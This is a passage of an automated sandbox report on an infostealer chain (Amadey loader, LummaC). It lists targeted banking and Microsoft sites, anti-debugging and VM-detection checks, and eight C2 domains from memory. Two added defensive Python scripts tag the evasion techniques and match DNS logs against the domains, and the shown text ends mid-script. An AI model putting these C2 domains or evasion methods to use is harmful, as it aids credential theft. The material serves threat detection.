Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.0000000001167000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware>
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWuYe
Source: file.exe, 00000000.00000003.1417736971.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417736971.000000000119B000.00000004.00000020.00020000.00000000.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815101814.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815101814.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1814788678.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarel
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXx
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958B39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW6634-1003_Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32)).
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: G4X9C8XP66LPZY0PX2HHB5N.exe, 00000003.00000002.1635804664.000000000077A000.00000040.00000001.01000000.00000006.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688949555.0000000000865000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.1688839922.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779960221.0000000000597000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813198385.0000000000601000.00000040.00000001.01000000.0000000F.sdmp, bd214fbd32.exe, 0000000E.00000002.1926320177.0000000000445000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 8138ba21a1.exe, 00000012.00000003.2024644856.00000000059E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 0000001D.00000002.2123319128.000001C958BDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:A
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\taskkill.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\taskkill.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe System information queried: KernelDebuggerInformation
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Code function: 3_2_04D50B3F rdtsc 3_2_04D50B3F
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Memory protected: page guard
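The sandbox-evasion and anti-debugging entries above are a flat list; what an analyst usually wants is a per-process summary of which techniques each dropped binary uses, plus a sanity check on the sleep values. The following triage script is an added example, not part of the sandbox's own tooling: it parses a handful of lines copied from the report above, tags each one with the technique it evidences (the tag names are this example's own), and flags the 922337203685477 value as an effectively infinite wait. The one assumption it makes is that the "-Ns" sleep figures are the NtDelayExecution interval in milliseconds (the "-30000s" threshold being the 30-second rule), which is consistent with 922337203685477 = floor((2^63 - 1) / 10000), the largest relative 100-ns interval.

```python
import re
from collections import defaultdict

# Sample input: lines copied from the report above, one observed behaviour per
# line in the "Source: <process path> <behaviour>" form of the text export.
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Code function: 3_2_04D50B3F rdtsc 3_2_04D50B3F
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe TID: 7152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176 Thread sleep count: 1297 > 30
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe System information queried: KernelDebuggerInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
"""

LINE_RE = re.compile(r"^Source:\s+(?P<source>\S+)\s+(?P<detail>.*)$")
SLEEP_RE = re.compile(r"Thread sleep time:\s*-(\d+)s")
COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")

# Assumption: the report prints the sleep as "-Ns" but N is the NtDelayExecution
# interval in milliseconds (the "-30000s" threshold is the 30-second rule).
# 922337203685477 == floor((2**63 - 1) / 10000): the largest relative 100-ns
# interval, i.e. a wait that never returns.
INFINITE_MS = (2**63 - 1) // 10000
LONG_SLEEP_MS = 30_000

# (regex over the behaviour text, tag); the tag vocabulary is this example's own.
RULES = [
    (r"name: (SystemBiosVersion|VideoBiosVersion|DriverDesc)\b", "vm-artifact:registry"),
    (r"SELECT \* FROM Win32_BIOS", "vm-artifact:wmi"),
    (r"\brdtsc\b", "timing:rdtsc"),
    (r"System information queried: CodeIntegrityInformation", "anti-debug:code-integrity"),
    (r"System information queried: KernelDebuggerInformation", "anti-debug:kernel-debugger"),
    (r"Thread information set: HideFromDebugger", "anti-debug:hide-thread"),
    (r"Process queried: DebugPort", "anti-debug:debugport"),
    (r"Open window title or class name:", "anti-analysis:tool-window"),
    (r"File opened: (SICE|NTICE|SIWVID)\b", "anti-debug:softice-device"),
]


def parse_line(line):
    """Split one report line into its process path and behaviour text."""
    m = LINE_RE.match(line.strip())
    return None if m is None else {"source": m.group("source"), "detail": m.group("detail")}


def sleep_ms(detail):
    """Requested sleep in milliseconds for a 'Thread sleep time' line, else None."""
    m = SLEEP_RE.search(detail)
    return int(m.group(1)) if m else None


def sleep_years(ms):
    """How long a sleep of `ms` milliseconds would really take, in Julian years."""
    return ms / 1000 / 86400 / 365.25


def classify(detail):
    """Tag one behaviour line with the evasion techniques it evidences."""
    tags = {tag for pattern, tag in RULES if re.search(pattern, detail)}
    ms = sleep_ms(detail)
    if ms is not None:
        if ms >= INFINITE_MS:
            tags.add("evasion:sleep-infinite")
        elif ms >= LONG_SLEEP_MS:
            tags.add("evasion:sleep-long")
    m = COUNT_RE.search(detail)
    if m and int(m.group(1)) > 30:  # many short sleeps add up to the same delay
        tags.add("evasion:sleep-loop")
    return tags


def triage(report_text):
    """Map each process (by file name) to the sorted list of techniques seen."""
    per_process = defaultdict(set)
    for line in report_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        tags = classify(ev["detail"])
        if tags:
            per_process[ev["source"].rsplit("\\", 1)[-1]].update(tags)
    return {name: sorted(tags) for name, tags in per_process.items()}


if __name__ == "__main__":
    for name, tags in sorted(triage(SAMPLE_REPORT).items()):
        print(f"{name}: {', '.join(tags)}")
    print(f"INFINITE_MS = {INFINITE_MS} ms, about {sleep_years(INFINITE_MS):.0f} years")
```

Run against the full text export, the same rules give a quick per-binary profile: skotes.exe (the Amadey loader) carries the registry, window-name and SoftICE checks, while the packed payloads rely on HideFromDebugger, DebugPort and the giant sleep. The sleep check is worth keeping separate from the rule table because a value that large is not a delay at all but a request never to be scheduled again, which a sandbox only survives by patching the call.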

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 320, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
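The eight domains above are the LummaC C2 list recovered from file.exe's memory. Turning them into something a SOC can use means pulling them out of the report and matching DNS telemetry against them, including subdomains and without the substring false positives a naive `in` check produces. The script below is an added example, not part of the report or of any vendor tooling: it extracts the domains from the "String found in binary or memory" lines, then scans a constructed DNS query log (the timestamps, client addresses and benign names are made up for the example) using suffix matching on label boundaries.

```python
import re

# Input copied from the report above: the memory strings that carry the C2 list.
REPORT_LINES = """\
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.1384221751.0000000004E70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
"""

# Constructed DNS query log: "<timestamp> <client> <qtype> <qname>". The benign
# entry, the look-alike "notclearancek.site", the trailing dot and the upper-case
# name are there to exercise the matcher; none of them comes from the report.
SAMPLE_DNS_LOG = """\
2024-10-22T10:00:01Z 10.0.0.5 A www.microsoft.com
2024-10-22T10:00:07Z 10.0.0.5 A clearancek.site
2024-10-22T10:00:09Z 10.0.0.5 A api.spirittunek.store.
2024-10-22T10:00:11Z 10.0.0.7 A notclearancek.site
2024-10-22T10:00:15Z 10.0.0.5 AAAA MOBBIPENJU.STORE
"""

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)\s*$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")


def normalize(name):
    """Lower-case and drop the trailing dot so 'A.B.' and 'a.b' compare equal."""
    return name.strip().lower().rstrip(".")


def extract_domains(report_text):
    """Collect every memory string from the report that looks like a DNS name."""
    found = set()
    for line in report_text.splitlines():
        m = STRING_RE.search(line)
        if m:
            cand = normalize(m.group(1))
            if DOMAIN_RE.match(cand):
                found.add(cand)
    return found


def matches_ioc(qname, iocs):
    """Return the IOC that qname equals or is a subdomain of, else None.

    Matching walks label boundaries, so 'api.spirittunek.store' hits
    'spirittunek.store' but 'notclearancek.site' does not hit 'clearancek.site'.
    The loop stops before the bare TLD so 'site' alone can never match.
    """
    labels = normalize(qname).split(".")
    for i in range(len(labels) - 1):
        suffix = ".".join(labels[i:])
        if suffix in iocs:
            return suffix
    return None


def scan_dns_log(log_text, iocs):
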